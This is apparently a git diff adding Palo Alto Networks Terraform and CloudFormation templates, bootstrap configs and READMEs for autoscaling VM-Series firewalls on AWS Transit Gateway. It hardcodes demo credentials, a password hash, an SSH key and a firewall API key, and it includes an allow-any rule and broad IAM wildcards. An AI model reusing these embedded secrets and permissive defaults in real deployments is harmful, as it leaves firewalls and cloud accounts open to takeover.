"${aws_s3_bucket.bootstrap_bucket_fw1.id}" + acl = "private" + key = "config/init-cfg.txt" + source = "bootstrap_files/fw1/init-cfg.txt" +} + +resource "aws_s3_bucket_object" "software" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw1.id}" + acl = "private" + key = "software/" + source = "/dev/null" +} + +resource "aws_s3_bucket_object" "license" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw1.id}" + acl = "private" + key = "license/authcodes" + source = "bootstrap_files/fw1/authcodes" +} + +resource "aws_s3_bucket_object" "content" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw1.id}" + acl = "private" + key = "content/" + source = "/dev/null" +} + + +#************************************************************************************ +# CREATE FW2 DIRECTORIES & UPLOAD FILES FROM /bootstrap_files/fw2 DIRECTORY +#************************************************************************************ +resource "aws_s3_bucket_object" "bootstrap_xml2" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw2.id}" + acl = "private" + key = "config/bootstrap.xml" + source = "bootstrap_files/fw2/bootstrap.xml" +} + +resource "aws_s3_bucket_object" "init-cft_txt2" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw2.id}" + acl = "private" + key = "config/init-cfg.txt" + source = "bootstrap_files/fw2/init-cfg.txt" +} + +resource "aws_s3_bucket_object" "software2" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw2.id}" + acl = "private" + key = "software/" + source = "/dev/null" +} + +resource "aws_s3_bucket_object" "license2" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw2.id}" + acl = "private" + key = "license/authcodes" + source = "bootstrap_files/fw2/authcodes" +} + +resource "aws_s3_bucket_object" "content2" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw2.id}" + acl = "private" + key = "content/" + source = "/dev/null" +} + + +#************************************************************************************ +# CREATE & ASSIGN IAM ROLE, POLICY, & INSTANCE PROFILE +#************************************************************************************ +resource "aws_iam_role" "bootstrap_role" { + name = "ngfw_bootstrap_role" + + assume_role_policy = < + +

+ +### Requirements +* Existing Transit Gateway +* Existing Transit Gateway route table for the Security-VPC attachment +* EC2 Key Pair for deployment region +* UN/PW: **pandemo** / **demopassword** + + +### How to Deploy +1. Open **variables.tf** in a text editor. +2. Uncomment default values and add correct value for following variables: + * **fw_ami** + * Firewall AMI for AWS Region, SKU, & PAN-OS version. + * **fw_sg_source** + * Source prefix to apply to VM-Series mgmt. interface + * **tgw_id** + * Existing Transit Gateway ID + * **tgw_rtb_id** + * Existing Transit Gateway Route Table ID +3. Save **variables.tf** +4. BYOL ONLY + * If you want to license the VM-Series on creation, copy and paste your Auth Code into the /bootstrap/authcodes file. The Auth Code must be registered with your Palo Alto Networks support account before proceeding. +Before proceeding, make sure you have accepted and subscribed to the VM-Series software in the AWS Marketplace. + +## Notes +1. us-gov-west was used for deployment testing. It should work in other regions provided the underlying features are available. + +## Support Policy +The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself. +Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. diff --git a/aws/tgw_inbound_asg-GovCloud/bootstrap_files/authcodes b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/authcodes new file mode 100644 index 00000000..8d1c8b69 --- /dev/null +++ b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/authcodes @@ -0,0 +1 @@ + diff --git a/aws/tgw_inbound_asg-GovCloud/bootstrap_files/bootstrap.xml b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/bootstrap.xml new file mode 100644 index 00000000..e0db5fed --- /dev/null +++ b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/bootstrap.xml @@ -0,0 +1,439 @@ + + + + + + ***** + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDcG9tWXUwNjNjQ2ViamNpd2R3czRyNjluUWNDcXoyQkkvMHR4WjA4RElzQkw3WFNqUmlSRCtvU3pDN1E4bTFOZ1dFcTN5ajRJTlI4Sm01WnZjcDJpRmVCbWdXTmZWc2hFQ1FwU2lMTmJXMFE5L05NRkNiZG9WandRUFhhRmhHTFQ1M2RiR3BzUFc4bE44NnRJam01cCsrYlR5T2tuUzFSUlJMWnNoYjZpSXRxbXZoRVdNRnZ4NG1CdnVxTHVqSHRaN1JhSksveTAxUkxGMXZCRE1aN01mbnVObGgwVXM1cTIwT2k0NjlLNzBrbi81bnF4YzZIWGpPRnRiYUZtUnhwK0FXbGs0a0x4YTdrTE0wNjMxRUgyUlZzY1Q5Q2kzYURVK2JPKzI0dzRGK2Y5U05NeFQzOW1TeFpmWXlMWHlqSGdWeE93QjZuRW5IUUcxSjdCRldHa1QgbXJtLWVhc3R1czEta2V5 + + + + + yes + + + $1$hqikhfkl$1Z1t7bvONQJM1IAh0erho1 + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + no + + + + + no + + mgmt + + no + + + + + + + + + + no + + + + + no + + mgmt + + no + + + + + + + + + + 3 + 5 + wait-recover + + + + + yes + yes + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + yes + no + no + no + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + 192.168.10.16 + 255.255.255.0 + 192.168.10.1 + PA-VM + no + + + + yes + + + FQDN + + + + yes + no + no + no + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDcG9tWXUwNjNjQ2ViamNpd2R3czRyNjluUWNDcXoyQkkvMHR4WjA4RElzQkw3WFNqUmlSRCtvU3pDN1E4bTFOZ1dFcTN5ajRJTlI4Sm01WnZjcDJpRmVCbWdXTmZWc2hFQ1FwU2lMTmJXMFE5L05NRkNiZG9WandRUFhhRmhHTFQ1M2RiR3BzUFc4bE44NnRJam01cCsrYlR5T2tuUzFSUlJMWnNoYjZpSXRxbXZoRVdNRnZ4NG1CdnVxTHVqSHRaN1JhSksveTAxUkxGMXZCRE1aN01mbnVObGgwVXM1cTIwT2k0NjlLNzBrbi81bnF4YzZIWGpPRnRiYUZtUnhwK0FXbGs0a0x4YTdrTE0wNjMxRUgyUlZzY1Q5Q2kzYURVK2JPKzI0dzRGK2Y5U05NeFQzOW1TeFpmWXlMWHlqSGdWeE93QjZuRW5IUUcxSjdCRldHa1QgbXJtLWVhc3R1czEta2V5 + mgmt-interface-swap + + + + yes + security-i-secur-Publi-MBTK5R0EMJSF_ASG_us-east-1a + + + + + + + + + + + + ethernet1/1 + + + + + + + ethernet1/2 + + + + + + + + + + + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + + + + + + + + + + + ethernet1/1 + ethernet1/2 + + + +
+ + 10.255.1.4 + UNTRUST-IP-address + +
+
+
+
+
+
diff --git a/aws/tgw_inbound_asg-GovCloud/bootstrap_files/init-cfg.txt b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/init-cfg.txt new file mode 100644 index 00000000..c77f637b --- /dev/null +++ b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/init-cfg.txt @@ -0,0 +1,10 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +dhcp-accept-server-hostname=yes +dns-primary=8.8.8.8 +dns-secondary=4.2.2.2 +op-command-modes=mgmt-interface-swap diff --git a/aws/tgw_inbound_asg-GovCloud/bootstrap_files/nlb.zip b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/nlb.zip new file mode 100644 index 00000000..066e08bc Binary files /dev/null and b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/nlb.zip differ diff --git a/aws/tgw_inbound_asg-GovCloud/bootstrap_files/pan_nlb_lambda.template b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/pan_nlb_lambda.template new file mode 100644 index 00000000..147b7f09 --- /dev/null +++ b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/pan_nlb_lambda.template @@ -0,0 +1,486 @@ +{ + "AWSTemplateFormatVersion" : "2010-09-09", + "Description" : "Creates an AWS Network Load balancer, which multiplexes traffic to registered scaled out back end web servers", + "Parameters": { + "NLBName": { + "Type" : "String", + "Description": "Enter the name of the NLB", + "Default": "prot-nlb", + "MinLength" : "3", + "MaxLength" : "120" + }, + "NLBARN": { + "Type" : "String", + "Description": "Enter the ARN of the NLB", + "Default": "prot-nlb", + "MinLength" : "3", + "MaxLength" : "150" + }, + "QueueURL": { + "Type" : "String", + "Description": "Enter the URL of the Queue to send messages to", + "MinLength" : "3", + "MaxLength" : "1024" + }, + "TableName": { + "Type" : "String", + "Default": "nlb_db_tbl", + "Description": "Enter the name of the database table", + "MinLength" : "3", + "MaxLength" : "120" + }, + "S3BucketName": { + "Type" : "String", + "Description": "Enter the name of the S3 Bucket which contains the lambda code", + "MinLength" : "3", + "MaxLength" : "120" + }, + "S3ObjectName": { + "Type" : "String", + "Default": "nlb.zip", + "Description": "Enter the name of the S3 object which contains the lambda code", + "MinLength" : "3", + "MaxLength" : "120" + }, + "RoleARN": { + "Type": "String", + "Default": "", + "Description": "The ARN of the role to use for Cross Account Access", + "MaxLength" : "120" + }, + "ExternalId": { + "Type": "String", + "Default": "", + "Description": "The external ID associated with the Cross Account Role", + "MaxLength" : "120" + }, + "SameAccount": { + "Type": "String", + "Default": "true", + "Description": "Flag to indicate if the NLB will be deployed into the same account or a different one", + "AllowedValues": [ + "true", + "false" + ] + } + }, + "Metadata" : { + "AWS::CloudFormation::Interface" : { + "ParameterLabels" : { + "NLB ARN": {"Ref": "NLBARN"}, + "NLB Name": {"Ref": "NLBNAME"}, + "Queue URL": {"Ref": "QueueURL"}, + "Table Name": {"Ref": "TableName"}, + "Lambda S3 Bucket Name": {"Ref": "S3BucketName"}, + "Lambda S3 Object Name": {"Ref": "S3ObjectName"} + } + } + }, + "Conditions": { + "CreateCrossAccountRole": {"Fn::Equals" : [{"Ref": "SameAccount"}, "false"] }, + "NoCrossAccountRole": {"Fn::Equals" : [{"Ref": "SameAccount"}, "true"] } + }, + "Resources": { + "LambdaExecutionRole0" : { + "Type": "AWS::IAM::Role", + "Condition": "NoCrossAccountRole", + "Properties": { + "AssumeRolePolicyDocument": { + "Version": "2012-10-17", + "Statement": [ { + "Effect": "Allow", + "Principal": { + "Service": "lambda.amazonaws.com" + }, + "Action": "sts:AssumeRole" + } ] + }, + "Path":"/", + "Policies": [ { + "PolicyName": "LambdaExecutionRolePolicy", + "PolicyDocument":{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": "s3:ListBucket", + "Resource": { "Fn::Join": [ "", [ "arn:aws-us-gov:s3:::", {"Ref": "S3BucketName" }, "/*" ] ] } + }, + { + "Effect": "Allow", + "Action": "s3:GetObject", + "Resource": { "Fn::Join": [ "", [ "arn:aws-us-gov:s3:::", { "Ref": "S3BucketName" }, "/*" ] ] } + }, + { + "Effect": "Allow", + "Action": [ + "ec2:DescribeSubnets" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "events:*" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "cloudwatch:*" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "lambda:AddPermission", + "lambda:CreateEventSourceMapping", + "lambda:CreateFunction", + "lambda:DeleteEventSourceMapping", + "lambda:DeleteFunction", + "lambda:GetEventSourceMapping", + "lambda:ListEventSourceMappings", + "lambda:RemovePermission", + "lambda:UpdateEventSourceMapping", + "lambda:UpdateFunctionCode", + "lambda:UpdateFunctionConfiguration", + "lambda:GetFunction", + "lambda:ListFunctions" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "sqs:ReceiveMessage", + "sqs:SendMessage", + "sqs:SetQueueAttributes", + "sqs:PurgeQueue" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "elasticloadbalancing:AddTags", + "elasticloadbalancing:AttachLoadBalancerToSubnets", + "elasticloadbalancing:ConfigureHealthCheck", + "elasticloadbalancing:DescribeInstanceHealth", + "elasticloadbalancing:DescribeLoadBalancerAttributes", + "elasticloadbalancing:DescribeLoadBalancerPolicyTypes", + "elasticloadbalancing:DescribeLoadBalancerPolicies", + "elasticloadbalancing:DescribeLoadBalancers", + "elasticloadbalancing:DescribeTags", + "elasticloadbalancing:DetachLoadBalancerFromSubnets", + "elasticloadbalancing:ModifyLoadBalancerAttributes", + "elasticloadbalancing:RemoveTags" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "iam:PassRole", + "iam:GetRole" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": ["logs:CreateLogGroup","logs:CreateLogStream","logs:PutLogEvents"], + "Resource": "arn:aws-us-gov:logs:*:*:*" + }, + { + "Effect": "Allow", + "Action": ["cloudformation:DescribeStacks"], + "Resource": "*" + }, + { + "Effect": "Allow", + "Action": [ + "logs:CreateLogGroup", + "logs:CreateLogStream", + "logs:PutDestination", + "logs:PutDestinationPolicy", + "logs:PutLogEvents", + "logs:PutMetricFilter" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "dynamodb:CreateTable", + "dynamodb:DeleteItem", + "dynamodb:DeleteTable", + "dynamodb:GetItem", + "dynamodb:PutItem" + ], + "Resource": [ + "*" + ] + } + ] + }}]} + }, + "LambdaExecutionRole1" : { + "Type": "AWS::IAM::Role", + "Condition": "CreateCrossAccountRole", + "Properties": { + "AssumeRolePolicyDocument": { + "Version": "2012-10-17", + "Statement": [ { + "Effect": "Allow", + "Principal": { + "Service": "lambda.amazonaws.com" + }, + "Action": "sts:AssumeRole" + } ] + }, + "Path":"/", + "Policies": [ { + "PolicyName": "LambdaExecutionRolePolicy", + "PolicyDocument":{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": "sts:AssumeRole", + "Resource": {"Ref": "RoleARN"} + }, + { + "Effect": "Allow", + "Action": "s3:ListBucket", + "Resource": { "Fn::Join": [ "", [ "arn:aws-us-gov:s3:::", {"Ref": "S3BucketName" }, "/*" ] ] } + }, + { + "Effect": "Allow", + "Action": "s3:GetObject", + "Resource": { "Fn::Join": [ "", [ "arn:aws-us-gov:s3:::", { "Ref": "S3BucketName" }, "/*" ] ] } + }, + { + "Effect": "Allow", + "Action": [ + "ec2:DescribeSubnets" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "events:*" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "cloudwatch:*" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "lambda:AddPermission", + "lambda:CreateEventSourceMapping", + "lambda:CreateFunction", + "lambda:DeleteEventSourceMapping", + "lambda:DeleteFunction", + "lambda:GetEventSourceMapping", + "lambda:ListEventSourceMappings", + "lambda:RemovePermission", + "lambda:UpdateEventSourceMapping", + "lambda:UpdateFunctionCode", + "lambda:UpdateFunctionConfiguration", + "lambda:GetFunction", + "lambda:ListFunctions" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "sqs:ReceiveMessage", + "sqs:SendMessage", + "sqs:SetQueueAttributes", + "sqs:PurgeQueue" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "elasticloadbalancing:AddTags", + "elasticloadbalancing:AttachLoadBalancerToSubnets", + "elasticloadbalancing:ConfigureHealthCheck", + "elasticloadbalancing:DescribeInstanceHealth", + "elasticloadbalancing:DescribeLoadBalancerAttributes", + "elasticloadbalancing:DescribeLoadBalancerPolicyTypes", + "elasticloadbalancing:DescribeLoadBalancerPolicies", + "elasticloadbalancing:DescribeLoadBalancers", + "elasticloadbalancing:DescribeTags", + "elasticloadbalancing:DetachLoadBalancerFromSubnets", + "elasticloadbalancing:ModifyLoadBalancerAttributes", + "elasticloadbalancing:RemoveTags" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "iam:PassRole", + "iam:GetRole" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": ["logs:CreateLogGroup","logs:CreateLogStream","logs:PutLogEvents"], + "Resource": "arn:aws-us-gov:logs:*:*:*" + }, + { + "Effect": "Allow", + "Action": ["cloudformation:DescribeStacks"], + "Resource": "*" + }, + { + "Effect": "Allow", + "Action": [ + "logs:CreateLogGroup", + "logs:CreateLogStream", + "logs:PutDestination", + "logs:PutDestinationPolicy", + "logs:PutLogEvents", + "logs:PutMetricFilter" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "dynamodb:CreateTable", + "dynamodb:DeleteItem", + "dynamodb:DeleteTable", + "dynamodb:GetItem", + "dynamodb:PutItem" + ], + "Resource": [ + "*" + ] + } + ] + }}]} + }, + "NLBDeployerLambda0" : { + "Type": "AWS::Lambda::Function", + "Condition": "NoCrossAccountRole", + "Properties": { + "Handler": "nlb_deployer.nlb_deploy_handler", + "Role": {"Fn::GetAtt" : + ["LambdaExecutionRole0", + "Arn" + ] + }, + "Code": { + "S3Bucket": { "Ref": "S3BucketName"}, + "S3Key": { "Ref": "S3ObjectName"} + }, + "Runtime": "python2.7", + "Timeout": "300" + } + }, + "NLBDeployerLambda1" : { + "Type": "AWS::Lambda::Function", + "Condition": "CreateCrossAccountRole", + "Properties": { + "Handler": "nlb_deployer.nlb_deploy_handler", + "Role": {"Fn::GetAtt" : + ["LambdaExecutionRole1", + "Arn" + ] + }, + "Code": { + "S3Bucket": { "Ref": "S3BucketName"}, + "S3Key": { "Ref": "S3ObjectName"} + }, + "Runtime": "python2.7", + "Timeout": "300" + } + }, + "LambdaCustomResource0": { + "Type": "AWS::CloudFormation::CustomResource", + "Condition": "NoCrossAccountRole", + "Version" : "1.0", + "DependsOn": ["NLBDeployerLambda0"], + "Properties" : { + "ServiceToken": { "Fn::GetAtt" : ["NLBDeployerLambda0", "Arn"] }, + "StackName": {"Ref": "AWS::StackName"}, + "Region": {"Ref": "AWS::Region"}, + "table_name": {"Ref": "TableName"}, + "NLB-ARN": {"Ref": "NLBARN"}, + "NLB-NAME": {"Ref": "NLBName"}, + "LambdaExecutionRole": {"Ref": "LambdaExecutionRole0"}, + "S3BucketName": {"Ref": "S3BucketName"}, + "S3ObjectName": {"Ref": "S3ObjectName"}, + "QueueURL": {"Ref": "QueueURL"}, + "RoleARN": {"Ref": "RoleARN"}, + "ExternalId": {"Ref": "ExternalId"} + } + }, + "LambdaCustomResource1": { + "Type": "AWS::CloudFormation::CustomResource", + "Condition": "CreateCrossAccountRole", + "Version" : "1.0", + "DependsOn": ["NLBDeployerLambda1"], + "Properties" : { + "ServiceToken": { "Fn::GetAtt" : ["NLBDeployerLambda1", "Arn"] }, + "StackName": {"Ref": "AWS::StackName"}, + "Region": {"Ref": "AWS::Region"}, + "table_name": {"Ref": "TableName"}, + "NLB-ARN": {"Ref": "NLBARN"}, + "NLB-NAME": {"Ref": "NLBName"}, + "LambdaExecutionRole": {"Ref": "LambdaExecutionRole1"}, + "S3BucketName": {"Ref": "S3BucketName"}, + "S3ObjectName": {"Ref": "S3ObjectName"}, + "QueueURL": {"Ref": "QueueURL"}, + "RoleARN": {"Ref": "RoleARN"}, + "ExternalId": {"Ref": "ExternalId"} + } + } + } +} diff --git a/aws/tgw_inbound_asg-GovCloud/bootstrap_files/panw-aws.zip b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/panw-aws.zip new file mode 100644 index 00000000..83dbc829 Binary files /dev/null and b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/panw-aws.zip differ diff --git a/aws/tgw_inbound_asg-GovCloud/diagram.png b/aws/tgw_inbound_asg-GovCloud/diagram.png new file mode 100644 index 00000000..59f6541c Binary files /dev/null and b/aws/tgw_inbound_asg-GovCloud/diagram.png differ diff --git a/aws/tgw_inbound_asg-GovCloud/main.tf b/aws/tgw_inbound_asg-GovCloud/main.tf new file mode 100644 index 00000000..28726fb0 --- /dev/null +++ b/aws/tgw_inbound_asg-GovCloud/main.tf @@ -0,0 +1,87 @@ +/* + SUPPORT POLICY +The guide in this directory and accompanied files are released under an as-is, best effort, support policy. +These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as +and when possible. We do not provide technical support or help in using or troubleshooting the components of +the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized +Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) +by the scripts or templates are still supported, but the support is only for the product functionality and +not for help in deploying or using the template or script itself. Unless explicitly tagged, all projects or +work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official +Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. +*/ + +#----------------------------------------------------------------------------------------------------------------- +# CREATE INBOUND SECURITY VPC +module "vpc_in" { + source = "./modules/vpc_in/" + tag = "${var.tag}" + region = "${var.region}" + tgw_id = "${var.tgw_id}" + tgw_rtb_id = "${var.tgw_rtb_id}" + cidr_vpc = "10.255.0.0/16" + azs = ["us-gov-west-1a", "us-gov-west-1b"] + cidr_mgmt = ["10.255.0.0/28", "10.255.0.16/28"] + cidr_untrust = ["10.255.1.0/28", "10.255.1.16/28"] + cidr_trust = ["10.255.2.0/28", "10.255.2.16/28"] + cidr_tgw = ["10.255.3.0/28", "10.255.3.16/28"] + cidr_natgw = ["10.255.4.0/28", "10.255.4.16/28"] + cidr_lambda = ["10.255.5.0/28", "10.255.5.16/28"] +} + +#----------------------------------------------------------------------------------------------------------------- +# CREATE S3 BUCKET FOR VM-SERIES BOOTSTRAP +module "s3_in" { + source = "./modules/s3_bootstrap/" + + file_location = "bootstrap_files/" + bucket_name = "fw-tgw-inbound-demo" + bucket_name_random = true + config = ["bootstrap.xml", "init-cfg.txt"] + license = ["authcodes"] + content = [] + software = [] + other = ["panw-aws.zip", "pan_nlb_lambda.template", "nlb.zip"] +} + +#----------------------------------------------------------------------------------------------------------------- +# DEPLOY VM-SERIES AUTOSCALE GROUP +module "fw_in" { + source = "./modules/fw_in_asg/" + + tag = "${var.tag}" + region = "${var.region}" + vpc_id = "${module.vpc_in.vpc_id}" + vpc_sg_id = "${module.vpc_in.default_security_group_id}" + lambda_bucket = "${module.s3_in.bucket_name}" + lambda_subnet_id = "${module.vpc_in.lambda_id}" + natgw_subnet_id = "${module.vpc_in.natgw_id}" + + fw_key_name = "${var.key_name}" + fw_bucket = "${module.s3_in.bucket_name}" + fw_ami = "${var.fw_ami}" + fw_vm_type = "m4.xlarge" + fw_sg_source = "${var.fw_sg_source}" + fw_subnet0_id = "${module.vpc_in.mgmt_id}" + fw_subnet1_id = "${module.vpc_in.untrust_id}" + fw_subnet2_id = "${module.vpc_in.trust_id}" + fw_min_instances = "1" // FOR EACH AZ + fw_max_instances = "2" // FOR EACH AZ + fw_scale_threshold_up = "80" + fw_scale_threshold_down = "20" + fw_scale_parameter = "DataPlaneCPUUtilizationPct" + fw_scale_period = "900" + + api_key_firewall = "LUFRPT1Zd2pYUGpkMUNrVEZlb3hROEQyUm95dXNGRkU9N0d4RGpTN2VZaVZYMVVoS253U0p6dlk3MkM0SDFySEh2UUR4Y3hzK2g3ST0=" + api_key_panorama = "" + api_key_delicense = "" + + enable_debug = "No" + + dependencies = [ + "${module.s3_in.completion}", + ] +} + +#----------------------------------------------------------------------------------------------------------------- + diff --git a/aws/tgw_inbound_asg-GovCloud/modules/fw_in_asg/main.tf b/aws/tgw_inbound_asg-GovCloud/modules/fw_in_asg/main.tf new file mode 100644 index 00000000..ff8c4a24 --- /dev/null +++ b/aws/tgw_inbound_asg-GovCloud/modules/fw_in_asg/main.tf @@ -0,0 +1,810 @@ +resource "null_resource" "dependency_getter" { + provisioner "local-exec" { + command = "echo ${length(var.dependencies)}" + } +} + +resource "random_string" "randomstring" { + length = 6 + min_upper = 4 + min_numeric = 2 + special = false +} + +resource "aws_iam_role" "FirewallBootstrapRole" { + name = "${var.tag}-vmseries-${random_string.randomstring.result}" + + assume_role_policy = < + +

+ +### Requirements +* Existing Transit Gateway +* Existing Transit Gateway route table for the Security-VPC attachment +* EC2 Key Pair for deployment region +* UN/PW: **pandemo** / **demopassword** + + +### How to Deploy +1. Open **variables.tf** in a text editor. +2. Uncomment default values and add correct value for following variables: + * **fw_ami** + * Firewall AMI for AWS Region, SKU, & PAN-OS version. + * **fw_sg_source** + * Source prefix to apply to VM-Series mgmt. interface + * **tgw_id** + * Existing Transit Gateway ID + * **tgw_rtb_id** + * Existing Transit Gateway Route Table ID +3. Save **variables.tf** +4. BYOL ONLY + * If you want to license the VM-Series on creation, copy and paste your Auth Code into the /bootstrap/authcodes file. The Auth Code must be registered with your Palo Alto Networks support account before proceeding. +Before proceeding, make sure you have accepted and subscribed to the VM-Series software in the AWS Marketplace. + + + +## Support Policy +The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself. +Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. diff --git a/aws/tgw_inbound_asg/bootstrap_files/authcodes b/aws/tgw_inbound_asg/bootstrap_files/authcodes new file mode 100644 index 00000000..8d1c8b69 --- /dev/null +++ b/aws/tgw_inbound_asg/bootstrap_files/authcodes @@ -0,0 +1 @@ + diff --git a/aws/tgw_inbound_asg/bootstrap_files/bootstrap.xml b/aws/tgw_inbound_asg/bootstrap_files/bootstrap.xml new file mode 100644 index 00000000..e0db5fed --- /dev/null +++ b/aws/tgw_inbound_asg/bootstrap_files/bootstrap.xml @@ -0,0 +1,439 @@ + + + + + + ***** + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDcG9tWXUwNjNjQ2ViamNpd2R3czRyNjluUWNDcXoyQkkvMHR4WjA4RElzQkw3WFNqUmlSRCtvU3pDN1E4bTFOZ1dFcTN5ajRJTlI4Sm01WnZjcDJpRmVCbWdXTmZWc2hFQ1FwU2lMTmJXMFE5L05NRkNiZG9WandRUFhhRmhHTFQ1M2RiR3BzUFc4bE44NnRJam01cCsrYlR5T2tuUzFSUlJMWnNoYjZpSXRxbXZoRVdNRnZ4NG1CdnVxTHVqSHRaN1JhSksveTAxUkxGMXZCRE1aN01mbnVObGgwVXM1cTIwT2k0NjlLNzBrbi81bnF4YzZIWGpPRnRiYUZtUnhwK0FXbGs0a0x4YTdrTE0wNjMxRUgyUlZzY1Q5Q2kzYURVK2JPKzI0dzRGK2Y5U05NeFQzOW1TeFpmWXlMWHlqSGdWeE93QjZuRW5IUUcxSjdCRldHa1QgbXJtLWVhc3R1czEta2V5 + + + + + yes + + + $1$hqikhfkl$1Z1t7bvONQJM1IAh0erho1 + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + no + + + + + no + + mgmt + + no + + + + + + + + + + no + + + + + no + + mgmt + + no + + + + + + + + + + 3 + 5 + wait-recover + + + + + yes + yes + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + yes + no + no + no + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + 192.168.10.16 + 255.255.255.0 + 192.168.10.1 + PA-VM + no + + + + yes + + + FQDN + + + + yes + no + no + no + + + 